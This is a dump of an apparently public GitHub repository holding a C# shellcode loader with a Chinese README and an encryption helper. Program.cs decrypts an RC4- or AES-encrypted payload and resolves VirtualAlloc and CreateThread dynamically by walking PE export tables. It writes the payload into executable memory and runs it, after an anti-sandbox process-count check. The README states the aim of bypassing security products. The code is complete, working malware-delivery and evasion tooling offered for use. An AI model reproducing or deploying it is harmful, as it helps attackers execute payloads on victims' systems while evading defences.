├── .vs └── Shellcode解密加载 │ ├── FileContentIndex │ ├── 34c69d00-98b2-4caa-b5d4-ee6dfb9955ad.vsidx │ ├── 55a31f78-c6ad-4617-a8d3-b7447ddc5692.vsidx │ ├── 9d0a2bbc-1d9e-4286-96cb-549b2020059e.vsidx │ ├── c5df3d70-b243-41aa-8a66-d4c46154a1cb.vsidx │ └── read.lock │ └── v17 │ └── .suo ├── README.MD ├── README ├── image-20231004202531392.png └── image-20231006201852683.png ├── Shellcode解密加载.sln ├── Shellcode解密加载 ├── DELEGATES.cs ├── DInvokeFunctions.cs ├── Program.cs ├── Properties │ └── AssemblyInfo.cs ├── Shellcode解密加载.csproj ├── bin │ ├── Debug │ │ ├── Shellcode解密加载.exe │ │ └── Shellcode解密加载.pdb │ └── Release │ │ ├── Shellcode解密加载.exe │ │ └── Shellcode解密加载.pdb └── obj │ ├── Debug │ ├── .NETFramework,Version=v4.0.AssemblyAttributes.cs │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ ├── Shellcode解密加载.csproj.AssemblyReference.cache │ ├── Shellcode解密加载.csproj.CoreCompileInputs.cache │ ├── Shellcode解密加载.csproj.FileListAbsolute.txt │ ├── Shellcode解密加载.exe │ └── Shellcode解密加载.pdb │ └── Release │ ├── .NETFramework,Version=v4.0.AssemblyAttributes.cs │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ ├── Shellcode解密加载.csproj.AssemblyReference.cache │ ├── Shellcode解密加载.csproj.CoreCompileInputs.cache │ ├── Shellcode解密加载.csproj.FileListAbsolute.txt │ ├── Shellcode解密加载.exe │ └── Shellcode解密加载.pdb └── encrypt_file.py /.vs/Shellcode解密加载/FileContentIndex/34c69d00-98b2-4caa-b5d4-ee6dfb9955ad.vsidx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xf555er/SharpShellcodeLoader_Rc4Aes/effe42c436f9499db7eb448bafe463991ef4839c/.vs/Shellcode解密加载/FileContentIndex/34c69d00-98b2-4caa-b5d4-ee6dfb9955ad.vsidx -------------------------------------------------------------------------------- /.vs/Shellcode解密加载/FileContentIndex/55a31f78-c6ad-4617-a8d3-b7447ddc5692.vsidx: -------------------------------------------------------------------------------- 1 | 
CDGS7"")");")]"*""1."AE"AR"CO"CR"DA"F1"KE"LE"RC"SH"TH"VI"WA"[*'TH(""("1("A("C("F("K("L("S("T("[(%)((S((U())().();(0)(0,(10(AE(AR(BY(CO(CR(DA(DE(DL(FA(FU(HT(IN(IV(KE(ME(PA(PO(PR(RM(ST(S[(T)(TH(UI(WH(^))(R));).H).L)AE)CO)MS*")++)-4F-73-B0-B7.").(D.*".."....0".0..AP.BL.CL.CO.CR.DE.DI.DL.EX.GE.HA.IN.IO.IV.KE.LE.LI.OR.PA.RE.RU.SE.SL.TA.TE.TH.TO.UT.VI.WA.WI.WR.ZE/////C//D//E//G//P/CO/DE/DI/EN/GI/MA/PA/PR/RC/RE/SU/WI0")0);0.*0.000)00,00001702306-0DD0X10X20X40XF0];1.010016]17-1C41];2.D20020223"25525629-2A:2B:2];3")32.3A84")4.A40)4494924F74_D55,56)56,56;56]6-769D6];7-470673A7F-8.G8C09")9-B9299D9://="D="K>(">(SA">A))A.LA.OA8CABOACEACKAD"AD(AD,AD.ADAADDADEADIADRAD_AESAGNAINAITAL.ALAALGALIALLALSALUAM(AM)AM>AMEAMIAMMANBANDANGANSANYAPHAPPARAARDAREARGARKARRARSARTARYASCASEASKASSATAATEATHATIAY(AYLA[IB.CB01B70BACBEABEYBITBJEBKEBLEBLIBLOBLYBOVBRABUFBYTC")C);C.GC0DC4"C4.C44C4_CADCCECDECEDCENCESCHECINCIPCKCCKPCKSCLACLOCLUCODCOLCOMCONCOPCOUCRECRICRXCRYCS.CS;CT"CT(CTECTICTOCTRCULCURC_PD")D("D(ID);D.SD/DD69D9"DALDATDD6DDIDDRDE,DE.DE:DECDELDEMDEPDERDESDEXDGADIADIDDINDIVDLEDLLDLSDOMDONDREDRXDUCDULDYND_PE("E((E()E(DE(FE))E);E)AE)]E.CE.GE.IE.LE.RE.WEKSAKSIKUPL",L.CL.GL32LAILALLASLBYLCOLE(LE.LE;LECLEELEGLEMLENLEOLERLESLEVLGOLIBLICLINLIZLL"LL;LLBLLCLLELLNLLOLNALOALOCLONLOOLOSLSELT;LTILTULT[LUELUSLY(LY:LYCLYDLYFLYPLYTLYVM((M()M(DM)MM.CM.DM.IM.LM.RM.SM.TM/MMADMAIMANMARMBLME)ME,ME.ME=MEAMEMMENMESMETMICMITMMAMMEMMOMODMORMP;MPAMPIMPOMS,MS.MUTMVIN("N(SN):N++N.WNALNAMNBENCANCENCONCRNCTNC_NDENDINDLNDONE(NECNEDNEENELNERNEWNEXNFINFONG(NG)NG.NGENGLNGTNG[NINNITNMENNANNINOSNOUNPONPUNQ;NS.NS>NSENSONT)NT,NT.NT3NTANTENTINTONTPNTRNTSNT[NULNVENVINVONY(OADOAROBJOBYOC"OCDOCEOCKOCRODEODIODUOF(OFFOGROIDOINOKEOKUOLEOLLOM/OM:OMPOMVON(ON)ON+ON.ON;ONCONDONEONFONGONMONNONPONSONTONVON]OOKOPSOPYOR!OR(ORAORDORFORGORIORKORSORYOSEOSTOTHOUNOUROUSOVEOVIOWEP(1PACPADPANPARPATPAYPEAPECPEDPENPEOPERPHAPHEPHYPILPINPLAPLYPOIPORPPLPREPRGPRIPROPS:PSEPT(PTEPTIPTOPTRPUBPUTPY(PYRQUAR(AR(FR(PR)(R.BR.TR.ZRADRAMRANRAPRARRATRAYRC4RCERDERDGRE(RE
AREFREMRENREPRESRETRFURG/RGARGSRICRIERIGRINRIPRITRIVRK(RKSRMERMURNARNERNSRO;ROCRODROGROMRONROPRORROVRRARRERRORSERSHRSIRSTRT.RTERTIRTURUERUNRVIRWIRX(RX)RX;RX>RY>RYARYPRYSS")S("S()S(DS(KS(PS),S.(S.BS.CS.GS.IS.KS.LS.PS.RS.TS.VS.WS/RS:"S:/SARSCESCHSCOSCRSE(SE)SE,SE:SECSEDSEMSENSERSESSETSEUSHASHESIBSIGSINSIOSIVSIZSKSSLESLYSOLSOUSPASS(SS)SS,SS.SSASSCSSESSIST,STASTESTISTRSULSUMSWASYMSYSS[(S[0S[1S[2S[IS[JS[_S_DT")T("T()T(0T(KT(ST))T)CT.ET.LT.TT32T>(TA"TA)TA,TA.TANTARTASTATTA[TBYTCOTCUTDETE(TE)TE(XCLXFFXITXPEXT,XT;Y">Y("Y()Y(BY(CY(DY(KY);Y.CY.LYADYCOYCUYDEYFIYLOYMMYNAYONYPEYPRYPTYRIYSIYSTYTEYTIYTRYVEY[_ZE)ZE:ZEDZER[(S[*][0][16[1][25[2][AS[DA[IT[I][J][_]_++_DE_PA_PT ('3?7 -------------------------------------------------------------------------------- /.vs/Shellcode解密加载/FileContentIndex/9d0a2bbc-1d9e-4286-96cb-549b2020059e.vsidx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xf555er/SharpShellcodeLoader_Rc4Aes/effe42c436f9499db7eb448bafe463991ef4839c/.vs/Shellcode解密加载/FileContentIndex/9d0a2bbc-1d9e-4286-96cb-549b2020059e.vsidx -------------------------------------------------------------------------------- /.vs/Shellcode解密加载/FileContentIndex/c5df3d70-b243-41aa-8a66-d4c46154a1cb.vsidx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xf555er/SharpShellcodeLoader_Rc4Aes/effe42c436f9499db7eb448bafe463991ef4839c/.vs/Shellcode解密加载/FileContentIndex/c5df3d70-b243-41aa-8a66-d4c46154a1cb.vsidx -------------------------------------------------------------------------------- /.vs/Shellcode解密加载/FileContentIndex/read.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xf555er/SharpShellcodeLoader_Rc4Aes/effe42c436f9499db7eb448bafe463991ef4839c/.vs/Shellcode解密加载/FileContentIndex/read.lock -------------------------------------------------------------------------------- 
/.vs/Shellcode解密加载/v17/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xf555er/SharpShellcodeLoader_Rc4Aes/effe42c436f9499db7eb448bafe463991ef4839c/.vs/Shellcode解密加载/v17/.suo -------------------------------------------------------------------------------- /README.MD: -------------------------------------------------------------------------------- 1 | # 项目简介 2 | 3 | 这个项目提供了一个工具,用于解密并加载shellcode。它支持RC4和AES两种解密方法,并使用DInvoke来动态调用WinAPI函数,从而尝试绕过某些安全解决方案 4 | 5 | DInvoke 是一个用于在 Windows 上动态替换 PInvoke 的库。DInvoke 包含了强大的原始功能,可以智能地组合使用,以精确地从磁盘或内存动态调用非托管代码。这可以用于多种目的,如 PE 解析、智能动态 API 解析、运行时动态加载 PE 插件、进程注入和避免 API 钩子。 6 | 7 | 8 | 9 | # 功能 10 | 11 | - **解密Shellcode**: 支持RC4和AES(CBC模式,PKCS7填充)两种解密算法。注意:两者都不带完整性校验,密文被篡改或密钥错误时无法被检测出来;RC4仅起混淆作用,不应视为保密手段。 12 | - **动态API调用**: 使用DInvoke动态调用WinAPI函数。 13 | - **反沙箱技术**: 通过检查系统进程数量来尝试检测沙箱环境。 14 | 15 | 16 | 17 | # 使用方法 18 | 19 | 使用encrypt_file.py对payload文件进行aes或rc4加密,随后会在控制台输出密钥,并在输入文件所在目录生成名为`encrypt_<原文件名>`的加密payload文件(密钥只打印一次,请妥善保存,解密时需要), 如下是aes加密的例子: 20 | 21 | ``` 22 | python.exe .\encrypt_file.py aes encrypt .\payload.bin 23 | ``` 24 | 25 | ![image-20231004202531392](README/image-20231004202531392.png) 26 | 27 | 28 | 29 | 再使用本项目解密shellcode并加载, 使用方法如下: 30 | 31 | ``` 32 | Shellcode解密加载.exe [payload_path] [decryption_method] [key] 33 | ``` 34 | 35 | - `payload_path`: 加密的shellcode的路径。 36 | - `decryption_method`: 使用的解密方法,可以是`rc4`或`aes`。 37 | - `key`: 解密密钥,即encrypt_file.py打印的密钥;密钥按UTF-8字节使用,aes模式下长度应为16/24/32字节。 38 | 39 | image-20231006201852683 40 | 41 | 42 | 43 | -------------------------------------------------------------------------------- /README/image-20231004202531392.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xf555er/SharpShellcodeLoader_Rc4Aes/effe42c436f9499db7eb448bafe463991ef4839c/README/image-20231004202531392.png -------------------------------------------------------------------------------- /README/image-20231006201852683.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/xf555er/SharpShellcodeLoader_Rc4Aes/effe42c436f9499db7eb448bafe463991ef4839c/README/image-20231006201852683.png -------------------------------------------------------------------------------- /Shellcode解密加载.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.5.33530.505 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Shellcode解密加载", "Shellcode解密加载\Shellcode解密加载.csproj", "{F1C44929-B017-4F7F-B706-73A8C0DD69D9}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {F1C44929-B017-4F7F-B706-73A8C0DD69D9}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {F1C44929-B017-4F7F-B706-73A8C0DD69D9}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {F1C44929-B017-4F7F-B706-73A8C0DD69D9}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {F1C44929-B017-4F7F-B706-73A8C0DD69D9}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {3112241E-796B-47C8-B699-5B6C77336B3D} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /Shellcode解密加载/DELEGATES.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | using System.Runtime.InteropServices; 7 | 8 | namespace Shellcode解密加载 9 | { 10 | // 委托的定义 11 | public class DELEGATES 12 | { 
13 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 14 | public delegate IntPtr VirtualAllocRx( 15 | UInt32 lpStartAddr, 16 | UInt32 size, 17 | UInt32 flAllocationType, 18 | UInt32 flProtect 19 | ); 20 | 21 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 22 | public delegate IntPtr CreateThreadRx( 23 | UInt32 lpThreadAttributes, 24 | UInt32 dwStackSize, 25 | IntPtr lpStartAddress, 26 | IntPtr param, 27 | UInt32 dwCreationFlags, 28 | ref UInt32 lpThreadId 29 | ); 30 | 31 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 32 | public delegate UInt32 WaitForSingleObjectRx(IntPtr hHandle, UInt32 dwMilliseconds); 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /Shellcode解密加载/DInvokeFunctions.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Diagnostics; 4 | using System.Linq; 5 | using System.Text; 6 | using System.Threading.Tasks; 7 | using System.Runtime.InteropServices; 8 | using System.IO; 9 | 10 | namespace Shellcode解密加载 11 | { 12 | public class DInvokeFunctions 13 | { 14 | // 获取已加载模块的地址 15 | public static IntPtr GetLoadedModuleAddress(string DLLName) 16 | { 17 | // 获取当前进程的所有模块 18 | ProcessModuleCollection ProcModules = Process.GetCurrentProcess().Modules; 19 | 20 | // 遍历每个模块,查找匹配的DLL名称 21 | foreach (ProcessModule Mod in ProcModules) 22 | { 23 | if (Mod.FileName.ToLower().EndsWith(DLLName.ToLower())) 24 | { 25 | return Mod.BaseAddress; 26 | } 27 | } 28 | return IntPtr.Zero; 29 | } 30 | 31 | // 获取库中函数的地址 32 | public static IntPtr GetLibraryAddress(string DLLName, string FunctionName, bool CanLoadFromDisk = false) 33 | { 34 | // 尝试获取已加载的模块地址 35 | IntPtr hModule = GetLoadedModuleAddress(DLLName); 36 | 37 | // 如果模块未加载,并且允许从磁盘加载,则尝试从磁盘加载模块 38 | if (hModule == IntPtr.Zero && CanLoadFromDisk) 39 | { 40 | hModule = LoadModuleFromDisk(DLLName); 41 | if (hModule == IntPtr.Zero) 42 | { 43 | throw 
new FileNotFoundException(DLLName + ", unable to find the specified file."); 44 | } 45 | } 46 | else if (hModule == IntPtr.Zero) 47 | { 48 | throw new DllNotFoundException(DLLName + ", Dll was not found."); 49 | } 50 | 51 | // 返回函数的导出地址 52 | return GetExportAddress(hModule, FunctionName); 53 | } 54 | 55 | // 获取模块中导出函数的地址 56 | public static IntPtr GetExportAddress(IntPtr ModuleBase, string ExportName) 57 | { 58 | IntPtr FunctionPtr = IntPtr.Zero; 59 | try 60 | { 61 | // 解析PE头部以获取导出表信息 62 | Int32 PeHeader = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + 0x3C)); 63 | Int16 OptHeaderSize = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + PeHeader + 0x14)); 64 | Int64 OptHeader = ModuleBase.ToInt64() + PeHeader + 0x18; 65 | Int16 Magic = Marshal.ReadInt16((IntPtr)OptHeader); 66 | Int64 pExport = 0; 67 | if (Magic == 0x010b) 68 | { 69 | pExport = OptHeader + 0x60; 70 | } 71 | else 72 | { 73 | pExport = OptHeader + 0x70; 74 | } 75 | 76 | // 获取导出表的详细信息 77 | Int32 ExportRVA = Marshal.ReadInt32((IntPtr)pExport); 78 | Int32 OrdinalBase = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x10)); 79 | Int32 NumberOfFunctions = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x14)); 80 | Int32 NumberOfNames = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x18)); 81 | Int32 FunctionsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x1C)); 82 | Int32 NamesRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x20)); 83 | Int32 OrdinalsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x24)); 84 | 85 | // 遍历导出名称表,查找匹配的函数名称 86 | for (int i = 0; i < NumberOfNames; i++) 87 | { 88 | string FunctionName = Marshal.PtrToStringAnsi((IntPtr)(ModuleBase.ToInt64() + Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + NamesRVA + i * 4)))); 89 | if (FunctionName.Equals(ExportName, StringComparison.OrdinalIgnoreCase)) 90 | { 91 | Int32 FunctionOrdinal = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + 
OrdinalsRVA + i * 2)) + OrdinalBase; 92 | Int32 FunctionRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + FunctionsRVA + (4 * (FunctionOrdinal - OrdinalBase)))); 93 | FunctionPtr = (IntPtr)((Int64)ModuleBase + FunctionRVA); 94 | break; 95 | } 96 | } 97 | } 98 | catch 99 | { 100 | // 捕获解析失败 101 | throw new InvalidOperationException("Failed to parse module exports."); 102 | } 103 | 104 | if (FunctionPtr == IntPtr.Zero) 105 | { 106 | // 导出未找到 107 | throw new MissingMethodException(ExportName + ", export not found."); 108 | } 109 | return FunctionPtr; 110 | } 111 | 112 | // 从磁盘加载模块(此函数当前未实现) 113 | public static IntPtr LoadModuleFromDisk(string DLLPath) 114 | { 115 | // 此函数未实现,只返回IntPtr.Zero 116 | IntPtr hModule = IntPtr.Zero; 117 | return hModule; 118 | } 119 | } 120 | } 121 | -------------------------------------------------------------------------------- /Shellcode解密加载/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Runtime.InteropServices; 5 | using System.Text; 6 | using System.Threading.Tasks; 7 | using System.Diagnostics; 8 | using System.Security.Cryptography; 9 | using System.IO; 10 | using static Shellcode解密加载.DELEGATES; 11 | 12 | 13 | namespace Shellcode解密加载 14 | { 15 | internal class Program 16 | { 17 | static void Main(string[] args) 18 | { 19 | CheckProcessCountAndExit(); 20 | if (args.Length != 3) 21 | { 22 | Console.WriteLine("Args count Error! 
The program need 3 args"); 23 | } 24 | 25 | string payload_path = args[0]; 26 | string decryption = args[1]; 27 | string key = args[2]; 28 | byte[] code = null; 29 | 30 | if (decryption == "rc4") 31 | { 32 | code = RC4_Decrypt(key, File.ReadAllBytes(payload_path)); 33 | } 34 | else if (decryption == "aes") 35 | { 36 | code = AES_Decrypt(key, File.ReadAllBytes(payload_path)); 37 | } 38 | else 39 | { 40 | Console.WriteLine("The input of Arg 2 is rc4 or aes"); 41 | } 42 | 43 | IntPtr func_ptr = IntPtr.Zero; 44 | 45 | var VirtualAllocRx = GetFunctionDelegate("kernel32.dll", "VirtualAlloc"); 46 | IntPtr rMemAddress = VirtualAllocRx(0, (uint)code.Length, 0x1000 | 0x2000, 0x40); 47 | 48 | Marshal.Copy(code, 0, (IntPtr)(rMemAddress), code.Length); 49 | IntPtr hThread = IntPtr.Zero; 50 | IntPtr pinfo = IntPtr.Zero; 51 | UInt32 threadId = 0; 52 | 53 | var CreateThreadRx = GetFunctionDelegate("kernel32.dll", "CreateThread"); 54 | hThread = CreateThreadRx(0, 0, rMemAddress, pinfo, 0, ref threadId); 55 | 56 | var WaitForSingleObjectRx = GetFunctionDelegate("kernel32.dll", "WaitForSingleObject"); 57 | WaitForSingleObjectRx(hThread, 0xFFFFFFFF); 58 | } 59 | 60 | // 获取函数委托 61 | private static T GetFunctionDelegate(string dllName, string functionName) where T : class 62 | { 63 | IntPtr funcAddress = DInvokeFunctions.GetLibraryAddress(dllName, functionName); 64 | return Marshal.GetDelegateForFunctionPointer(funcAddress, typeof(T)) as T; 65 | } 66 | 67 | // RC4解密函数 68 | public static byte[] RC4_Decrypt(string key, byte[] data) 69 | { 70 | byte[] bkey = Encoding.UTF8.GetBytes(key); 71 | 72 | byte[] dec = RC4.Apply(data, bkey); 73 | 74 | return dec; 75 | } 76 | 77 | // AES解密函数 78 | public static byte[] AES_Decrypt(string key, byte[] data) 79 | { 80 | byte[] dec; 81 | 82 | using (Aes aes = Aes.Create()) 83 | { 84 | aes.Key = Encoding.UTF8.GetBytes(key); 85 | 86 | Console.WriteLine("[*] Key bytes: " + aes.Key.Length); 87 | Console.WriteLine("[*] Padding mode: " + (byte)aes.Padding); 88 | 
Console.WriteLine("[*] AES keysize: " + aes.KeySize); 89 | Console.WriteLine("[*] AES blockSize: " + aes.BlockSize); 90 | 91 | using (MemoryStream ms = new MemoryStream(data)) 92 | { 93 | // 从数据中读取IV 94 | byte[] iv = new byte[16]; 95 | ms.Read(iv, 0, iv.Length); 96 | aes.IV = iv; 97 | 98 | // 输出IV信息 99 | Console.WriteLine("[*] IV length: " + aes.IV.Length); 100 | Console.WriteLine("[*] IV bytes: " + BitConverter.ToString(aes.IV)); 101 | } 102 | 103 | using (MemoryStream ms = new MemoryStream()) 104 | { 105 | using (CryptoStream cs = new CryptoStream((Stream)ms, aes.CreateDecryptor(aes.Key, aes.IV), CryptoStreamMode.Write)) 106 | { 107 | //Provide IV offset, expected length of decrypted plaintext, and write to CryptoStream 108 | int DecryptedLength = (data.Length - aes.IV.Length); 109 | cs.Write(data, aes.IV.Length, DecryptedLength); 110 | cs.Close(); 111 | } 112 | 113 | dec = ms.ToArray(); 114 | ms.Close(); 115 | } 116 | } 117 | //Console.WriteLine("[*] Decrypted Bytes:" + dec); 118 | return dec; 119 | } 120 | 121 | // 利用检测进程数实现反沙箱 122 | private static void CheckProcessCountAndExit() 123 | { 124 | var processCount = Process.GetProcesses().Length; 125 | if (processCount < 40) 126 | { 127 | Console.WriteLine("Less than 40 processes are running. Exiting..."); 128 | Environment.Exit(0); 129 | } 130 | } 131 | } 132 | public static class RC4 133 | { 134 | /// RC4 class sourced from: https://github.com/manbeardgames/RC4 135 | /// MIT License 136 | /// 137 | /// Give data and an encryption key, apply RC4 cryptography. RC4 is symmetric, 138 | /// which means this single method will work for encrypting and decrypting. 139 | /// 140 | /// 141 | /// https://en.wikipedia.org/wiki/RC4 142 | /// 143 | /// 144 | /// Byte array representing the data to be encrypted/decrypted 145 | /// 146 | /// 147 | /// Byte array representing the key to use 148 | /// 149 | /// 150 | /// Byte array representing the encrypted/decrypted data. 
151 | /// 152 | public static byte[] Apply(byte[] data, byte[] key) 153 | { 154 | // Key Scheduling Algorithm Phase: 155 | // KSA Phase Step 1: First, the entries of S are set equal to the values of 0 to 255 156 | // in ascending order. 157 | int[] S = new int[256]; 158 | for (int _ = 0; _ < 256; _++) 159 | { 160 | S[_] = _; 161 | } 162 | 163 | // KSA Phase Step 2a: Next, a temporary vector T is created. 164 | int[] T = new int[256]; 165 | 166 | // KSA Phase Step 2b: If the length of the key k is 256 bytes, then k is assigned to T. 167 | if (key.Length == 256) 168 | { 169 | Buffer.BlockCopy(key, 0, T, 0, key.Length); 170 | } 171 | else 172 | { 173 | // Otherwise, for a key with a given length, copy the elements of 174 | // the key into vector T, repeating for as many times as neccessary to 175 | // fill T 176 | for (int _ = 0; _ < 256; _++) 177 | { 178 | T[_] = key[_ % key.Length]; 179 | } 180 | } 181 | 182 | // KSA Phase Step 3: We use T to produce the initial permutation of S ... 183 | int i = 0; 184 | int j = 0; 185 | for (i = 0; i < 256; i++) 186 | { 187 | // increment j by the sum of S[i] and T[i], however keeping it within the 188 | // range of 0 to 255 using mod (%) division. 189 | j = (j + S[i] + T[i]) % 256; 190 | 191 | // Swap the values of S[i] and S[j] 192 | int temp = S[i]; 193 | S[i] = S[j]; 194 | S[j] = temp; 195 | } 196 | 197 | // Pseudo random generation algorithm (Stream Generation): 198 | // Once the vector S is initialized from above in the Key Scheduling Algorithm Phase, 199 | // the input key is no longer used. In this phase, for the length of the data, we ... 200 | i = j = 0; 201 | byte[] result = new byte[data.Length]; 202 | for (int iteration = 0; iteration < data.Length; iteration++) 203 | { 204 | // PRGA Phase Step 1. Continously increment i from 0 to 255, starting it back 205 | // at 0 once we go beyond 255 (this is done with mod (%) division 206 | i = (i + 1) % 256; 207 | 208 | // PRGA Phase Step 2. 
Lookup the i'th element of S and add it to j, keeping the 209 | // result within the range of 0 to 255 using mod (%) division 210 | j = (j + S[i]) % 256; 211 | 212 | // PRGA Phase Step 3. Swap the values of S[i] and S[j] 213 | int temp = S[i]; 214 | S[i] = S[j]; 215 | S[j] = temp; 216 | 217 | // PRGA Phase Step 4. Use the result of the sum of S[i] and S[j], mod (%) by 256, 218 | // to get the index of S that handls the value of the stream value K. 219 | int K = S[(S[i] + S[j]) % 256]; 220 | 221 | // PRGA Phase Step 5. Use bitwise exclusive OR (^) with the next byte in the data to 222 | // produce the next byte of the resulting ciphertext (when 223 | // encrypting) or plaintext (when decrypting) 224 | result[iteration] = Convert.ToByte(data[iteration] ^ K); 225 | } 226 | 227 | // return the result 228 | return result; 229 | } 230 | } 231 | } 232 | -------------------------------------------------------------------------------- /Shellcode解密加载/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // 有关程序集的一般信息由以下 6 | // 控制。更改这些特性值可修改 7 | // 与程序集关联的信息。 8 | [assembly: AssemblyTitle("Shellcode解密加载")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("Shellcode解密加载")] 13 | [assembly: AssemblyCopyright("Copyright © 2023")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // 将 ComVisible 设置为 false 会使此程序集中的类型 18 | //对 COM 组件不可见。如果需要从 COM 访问此程序集中的类型 19 | //请将此类型的 ComVisible 特性设置为 true。 20 | [assembly: ComVisible(false)] 21 | 22 | // 如果此项目向 COM 公开,则下列 GUID 用于类型库的 ID 23 | [assembly: Guid("f1c44929-b017-4f7f-b706-73a8c0dd69d9")] 24 | 25 | // 程序集的版本信息由下列四个值组成: 26 | // 27 | // 主版本 28 | // 次版本 29 | // 生成号 30 | // 修订号 31 | // 32 | //可以指定所有这些值,也可以使用“生成号”和“修订号”的默认值 33 | 
//通过使用 "*",如下所示: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /Shellcode解密加载/Shellcode解密加载.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {F1C44929-B017-4F7F-B706-73A8C0DD69D9} 8 | Exe 9 | Shellcode解密加载 10 | Shellcode解密加载 11 | v4.0 12 | 512 13 | true 14 | 15 | 16 | AnyCPU 17 | true 18 | full 19 | false 20 | bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | 25 | 26 | AnyCPU 27 | pdbonly 28 | true 29 | bin\Release\ 30 | TRACE 31 | prompt 32 | 4 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | -------------------------------------------------------------------------------- /Shellcode解密加载/bin/Debug/Shellcode解密加载.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xf555er/SharpShellcodeLoader_Rc4Aes/effe42c436f9499db7eb448bafe463991ef4839c/Shellcode解密加载/bin/Debug/Shellcode解密加载.exe -------------------------------------------------------------------------------- /Shellcode解密加载/bin/Debug/Shellcode解密加载.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xf555er/SharpShellcodeLoader_Rc4Aes/effe42c436f9499db7eb448bafe463991ef4839c/Shellcode解密加载/bin/Debug/Shellcode解密加载.pdb -------------------------------------------------------------------------------- /Shellcode解密加载/bin/Release/Shellcode解密加载.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xf555er/SharpShellcodeLoader_Rc4Aes/effe42c436f9499db7eb448bafe463991ef4839c/Shellcode解密加载/bin/Release/Shellcode解密加载.exe -------------------------------------------------------------------------------- 
/Shellcode解密加载/bin/Release/Shellcode解密加载.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xf555er/SharpShellcodeLoader_Rc4Aes/effe42c436f9499db7eb448bafe463991ef4839c/Shellcode解密加载/bin/Release/Shellcode解密加载.pdb -------------------------------------------------------------------------------- /Shellcode解密加载/obj/Debug/.NETFramework,Version=v4.0.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.0", FrameworkDisplayName = ".NET Framework 4")] 5 | -------------------------------------------------------------------------------- /Shellcode解密加载/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xf555er/SharpShellcodeLoader_Rc4Aes/effe42c436f9499db7eb448bafe463991ef4839c/Shellcode解密加载/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /Shellcode解密加载/obj/Debug/Shellcode解密加载.csproj.AssemblyReference.cache: -------------------------------------------------------------------------------- 